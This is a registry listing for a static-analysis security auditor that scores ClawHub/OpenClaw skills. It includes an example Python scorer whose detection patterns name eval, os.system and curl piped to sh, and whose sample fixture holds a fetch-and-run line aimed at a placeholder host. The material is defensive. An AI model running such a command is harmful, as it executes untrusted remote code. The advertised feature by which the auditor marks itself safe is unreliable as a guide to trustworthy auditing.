claw-secure-auditor

Security audit tool for ClawHub/OpenClaw skills (static analysis + reputation scoring)

Safety Notice

This listing is from the official public ClawHub registry. Review SKILL.md and referenced scripts before running.

Install skill "claw-secure-auditor" with this command: npx skills add emeraldring3134-netizen/claw-secure-auditor

🛡️ Claw Secure Auditor v1.1.1

Security audit tool for ClawHub/OpenClaw skills with static analysis and reputation scoring.


🚀 Quick Start

1. Configure (optional)

export VIRUSTOTAL_API_KEY="your-api-key-here"

2. Use

# Quick audit (static + reputation)
python3 scripts/auditor.py quick ./my-skill

# Full audit (static + sandbox + VirusTotal)
python3 scripts/auditor.py full ./my-skill

# Pre-publish audit
python3 scripts/auditor.py before-publish ./my-skill

📋 Features

  • ✅ Static analysis: detection of 120+ dangerous keywords
  • ✅ Self-whitelist: the auditor automatically marks itself as safe
  • ✅ Reputation score: 0-100 with Safe/Caution/Dangerous levels
  • ✅ JSON report export
  • ✅ Read-only operation, no file modification

📊 Risk Levels

| Score  | Level     | Color |
|--------|-----------|-------|
| 90-100 | Safe      | 🟢    |
| 70-89  | Caution   | 🟡    |
| 0-69   | Dangerous | 🔴    |
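
A sketch of how keyword-based static analysis can feed a 0-100 score that maps to the risk levels above. This is an added example, not code from claw-secure-auditor: the patterns, penalty weights, scoring formula and function names are assumptions, and only the level thresholds come from this page.

```python
import re
from pathlib import Path

# Assumed patterns and penalty weights (illustrative; not the tool's 120+ list).
PATTERNS = {
    r"\beval\s*\(": 15,
    r"\bexec\s*\(": 15,
    r"\bos\.system\s*\(": 15,
    r"\bsubprocess\b": 10,
    r"curl[^\n|]*\|\s*(ba)?sh": 35,
}
COMPILED = [(re.compile(p), w) for p, w in PATTERNS.items()]

def level(score):
    """Map a 0-100 score to the levels in the Risk Levels table."""
    if score >= 90:
        return "Safe"
    return "Caution" if score >= 70 else "Dangerous"

def audit_files(files):
    """files: {name: text}. Returns (score, level, findings)."""
    findings = []
    for name, text in sorted(files.items()):
        for lineno, line in enumerate(text.splitlines(), 1):
            for rx, weight in COMPILED:
                if rx.search(line):
                    findings.append((name, lineno, rx.pattern, weight))
    # Assumed scoring: start at 100, subtract each finding's weight, floor at 0.
    score = max(0, 100 - sum(f[3] for f in findings))
    return score, level(score), findings

def audit_dir(root):
    """Read-only walk: files are opened for reading, never written."""
    files = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in {".py", ".sh", ".md", ".js"}:
            files[str(p.relative_to(root))] = p.read_text(errors="replace")
    return audit_files(files)

# Constructed sample skill, embedded so the example runs offline.
SAMPLE = {
    "SKILL.md": "# demo skill\nRun scripts/run.py\n",
    "scripts/run.py": "import subprocess\nresult = eval(user_input)\n",
    "scripts/setup.sh": "curl https://example.invalid/i.sh | sh\n",
}
if __name__ == "__main__":
    score, lvl, findings = audit_files(SAMPLE)
    for name, lineno, pattern, weight in findings:
        print(f"{name}:{lineno}: -{weight} {pattern}")
    print(score, lvl)
```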

📌 Usage Examples

python3 scripts/auditor.py quick ./my-skill
python3 scripts/auditor.py full ./my-skill
python3 scripts/auditor.py before-publish ./my-new-skill

⚠️ Security Note

The auditor operates read-only: it does not modify files or perform external writes, and API keys are used only for public data queries.


📝 Changelog

v1.1.1 (2026-03)

  • Simplified metadata for ClawHub compatibility
  • Removed complex dependencies
  • Kept core audit functionality

v1.1.0 (2026-03)

  • Self-whitelist: auto-mark self as safe
  • Full English translation
  • Improved scoring algorithm

v1.0.0 (2026-03)

  • Initial release with 120+ pattern detection

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.
